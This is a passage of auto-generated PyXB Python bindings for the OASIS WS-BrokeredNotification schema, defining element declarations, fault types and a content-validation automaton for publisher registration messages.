__TopicSet = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wstop, 'TopicSet'), 'TopicSet', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnt_1TopicSet', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wstop.xsd', 133, 2), )
TopicSet = property(__TopicSet.value, __TopicSet.set, None, None)
_ElementMap.update({
__TopicExpression.name() : __TopicExpression,
__FixedTopicSet.name() : __FixedTopicSet,
__TopicExpressionDialect.name() : __TopicExpressionDialect,
__RequiresRegistration.name() : __RequiresRegistration,
__TopicSet.name() : __TopicSet
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 77, 12)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://docs.oasis-open.org/wsn/br-2}PublisherReference uses Python identifier PublisherReference
__PublisherReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), 'PublisherReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2PublisherReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 46, 3), )
PublisherReference = property(__PublisherReference.value, __PublisherReference.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}Topic uses Python identifier Topic
__Topic = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Topic'), 'Topic', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2Topic', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 50, 3), )
Topic = property(__Topic.value, __Topic.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}Demand uses Python identifier Demand
__Demand = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Demand'), 'Demand', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2Demand', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 52, 3), )
Demand = property(__Demand.value, __Demand.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}CreationTime uses Python identifier CreationTime
__CreationTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'CreationTime'), 'CreationTime', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2CreationTime', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 54, 3), )
CreationTime = property(__CreationTime.value, __CreationTime.set, None, None)
_ElementMap.update({
__PublisherReference.name() : __PublisherReference,
__Topic.name() : __Topic,
__Demand.name() : __Demand,
__CreationTime.name() : __CreationTime
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 93, 12)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://docs.oasis-open.org/wsn/br-2}PublisherReference uses Python identifier PublisherReference
__PublisherReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), 'PublisherReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2PublisherReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18), )
PublisherReference = property(__PublisherReference.value, __PublisherReference.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}Topic uses Python identifier Topic
__Topic = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Topic'), 'Topic', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2Topic', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18), )
Topic = property(__Topic.value, __Topic.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}Demand uses Python identifier Demand
__Demand = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Demand'), 'Demand', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2Demand', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18), )
Demand = property(__Demand.value, __Demand.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}InitialTerminationTime uses Python identifier InitialTerminationTime
__InitialTerminationTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'InitialTerminationTime'), 'InitialTerminationTime', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2InitialTerminationTime', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18), )
InitialTerminationTime = property(__InitialTerminationTime.value, __InitialTerminationTime.set, None, None)
_HasWildcardElement = True
_ElementMap.update({
__PublisherReference.name() : __PublisherReference,
__Topic.name() : __Topic,
__Demand.name() : __Demand,
__InitialTerminationTime.name() : __InitialTerminationTime
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 114, 12)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationReference uses Python identifier PublisherRegistrationReference
__PublisherRegistrationReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationReference'), 'PublisherRegistrationReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_3_httpdocs_oasis_open_orgwsnbr_2PublisherRegistrationReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 116, 18), )
PublisherRegistrationReference = property(__PublisherRegistrationReference.value, __PublisherRegistrationReference.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}ConsumerReference uses Python identifier ConsumerReference
__ConsumerReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference'), 'ConsumerReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_3_httpdocs_oasis_open_orgwsnbr_2ConsumerReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5), )
ConsumerReference = property(__ConsumerReference.value, __ConsumerReference.set, None, None)
_ElementMap.update({
__PublisherRegistrationReference.name() : __PublisherRegistrationReference,
__ConsumerReference.name() : __ConsumerReference
})
_AttributeMap.update({
})
# Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationRejectedFaultType with content type ELEMENT_ONLY
class PublisherRegistrationRejectedFaultType (pyxb.bundles.wssplat.wsrf_bf.BaseFaultType):
"""Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationRejectedFaultType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationRejectedFaultType')
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 127, 3)
_ElementMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._ElementMap.copy()
_AttributeMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._AttributeMap.copy()
# Base type is pyxb.bundles.wssplat.wsrf_bf.BaseFaultType
# Element Timestamp ({http://docs.oasis-open.org/wsrf/bf-2}Timestamp) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element Originator ({http://docs.oasis-open.org/wsrf/bf-2}Originator) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element ErrorCode ({http://docs.oasis-open.org/wsrf/bf-2}ErrorCode) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element Description ({http://docs.oasis-open.org/wsrf/bf-2}Description) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element FaultCause ({http://docs.oasis-open.org/wsrf/bf-2}FaultCause) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2'))
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'PublisherRegistrationRejectedFaultType', PublisherRegistrationRejectedFaultType)
# Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationFailedFaultType with content type ELEMENT_ONLY
class PublisherRegistrationFailedFaultType (pyxb.bundles.wssplat.wsrf_bf.BaseFaultType):
"""Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationFailedFaultType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationFailedFaultType')
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 135, 3)
_ElementMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._ElementMap.copy()
_AttributeMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._AttributeMap.copy()
# Base type is pyxb.bundles.wssplat.wsrf_bf.BaseFaultType
# Element Timestamp ({http://docs.oasis-open.org/wsrf/bf-2}Timestamp) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element Originator ({http://docs.oasis-open.org/wsrf/bf-2}Originator) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element ErrorCode ({http://docs.oasis-open.org/wsrf/bf-2}ErrorCode) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element Description ({http://docs.oasis-open.org/wsrf/bf-2}Description) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element FaultCause ({http://docs.oasis-open.org/wsrf/bf-2}FaultCause) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2'))
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'PublisherRegistrationFailedFaultType', PublisherRegistrationFailedFaultType)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 146, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_strict, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_5 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 156, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_strict, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
# Complex type {http://docs.oasis-open.org/wsn/br-2}ResourceNotDestroyedFaultType with content type ELEMENT_ONLY
class ResourceNotDestroyedFaultType (pyxb.bundles.wssplat.wsrf_bf.BaseFaultType):
"""Complex type {http://docs.oasis-open.org/wsn/br-2}ResourceNotDestroyedFaultType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ResourceNotDestroyedFaultType')
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 165, 2)
_ElementMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._ElementMap.copy()
_AttributeMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._AttributeMap.copy()
# Base type is pyxb.bundles.wssplat.wsrf_bf.BaseFaultType
# Element Timestamp ({http://docs.oasis-open.org/wsrf/bf-2}Timestamp) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element Originator ({http://docs.oasis-open.org/wsrf/bf-2}Originator) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element ErrorCode ({http://docs.oasis-open.org/wsrf/bf-2}ErrorCode) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element Description ({http://docs.oasis-open.org/wsrf/bf-2}Description) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
# Element FaultCause ({http://docs.oasis-open.org/wsrf/bf-2}FaultCause) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2'))
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'ResourceNotDestroyedFaultType', ResourceNotDestroyedFaultType)
RequiresRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration'), pyxb.binding.datatypes.boolean, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 43, 3))
Namespace.addCategoryObject('elementBinding', RequiresRegistration.name().localName(), RequiresRegistration)
PublisherReference = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 46, 3))
Namespace.addCategoryObject('elementBinding', PublisherReference.name().localName(), PublisherReference)
ConsumerReference = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 48, 3))
Namespace.addCategoryObject('elementBinding', ConsumerReference.name().localName(), ConsumerReference)
Topic = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Topic'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 50, 3))
Namespace.addCategoryObject('elementBinding', Topic.name().localName(), Topic)
Demand = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Demand'), pyxb.binding.datatypes.boolean, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 52, 3))
Namespace.addCategoryObject('elementBinding', Demand.name().localName(), Demand)
CreationTime = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'CreationTime'), pyxb.binding.datatypes.dateTime, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 54, 3))
Namespace.addCategoryObject('elementBinding', CreationTime.name().localName(), CreationTime)
NotificationBrokerRP = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NotificationBrokerRP'), CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 56, 3))
Namespace.addCategoryObject('elementBinding', NotificationBrokerRP.name().localName(), NotificationBrokerRP)
PublisherRegistrationRP = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationRP'), CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 76, 3))
Namespace.addCategoryObject('elementBinding', PublisherRegistrationRP.name().localName(), PublisherRegistrationRP)
RegisterPublisher = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RegisterPublisher'), CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 92, 3))
Namespace.addCategoryObject('elementBinding', RegisterPublisher.name().localName(), RegisterPublisher)
RegisterPublisherResponse = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RegisterPublisherResponse'), CTD_ANON_3, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 113, 3))
Namespace.addCategoryObject('elementBinding', RegisterPublisherResponse.name().localName(), RegisterPublisherResponse)
PublisherRegistrationRejectedFault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationRejectedFault'), PublisherRegistrationRejectedFaultType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 132, 3))
Namespace.addCategoryObject('elementBinding', PublisherRegistrationRejectedFault.name().localName(), PublisherRegistrationRejectedFault)
PublisherRegistrationFailedFault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationFailedFault'), PublisherRegistrationFailedFaultType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 140, 3))
Namespace.addCategoryObject('elementBinding', PublisherRegistrationFailedFault.name().localName(), PublisherRegistrationFailedFault)
DestroyRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'DestroyRegistration'), CTD_ANON_4, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 145, 3))
Namespace.addCategoryObject('elementBinding', DestroyRegistration.name().localName(), DestroyRegistration)
DestroyRegistrationResponse = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'DestroyRegistrationResponse'), CTD_ANON_5, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 155, 2))
Namespace.addCategoryObject('elementBinding', DestroyRegistrationResponse.name().localName(), DestroyRegistrationResponse)
ResourceNotDestroyedFault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ResourceNotDestroyedFault'), ResourceNotDestroyedFaultType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 170, 2))
Namespace.addCategoryObject('elementBinding', ResourceNotDestroyedFault.name().localName(), ResourceNotDestroyedFault)
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpression'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 71, 2)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'FixedTopicSet'), pyxb.binding.datatypes.boolean, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 72, 2), unicode_default='true'))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpressionDialect'), pyxb.binding.datatypes.anyURI, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 73, 2)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration'), pyxb.binding.datatypes.boolean, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 43, 3)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wstop, 'TopicSet'), pyxb.bundles.wssplat.wstop.TopicSetType, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wstop.xsd', 133, 2)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 60, 18))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 62, 12))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 64, 12))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 66, 18))
counters.add(cc_3)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpression')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 60, 18))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'FixedTopicSet')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 62, 12))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpressionDialect')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 64, 12))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wstop, 'TopicSet')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 66, 18))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 69, 18))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 46, 3)))
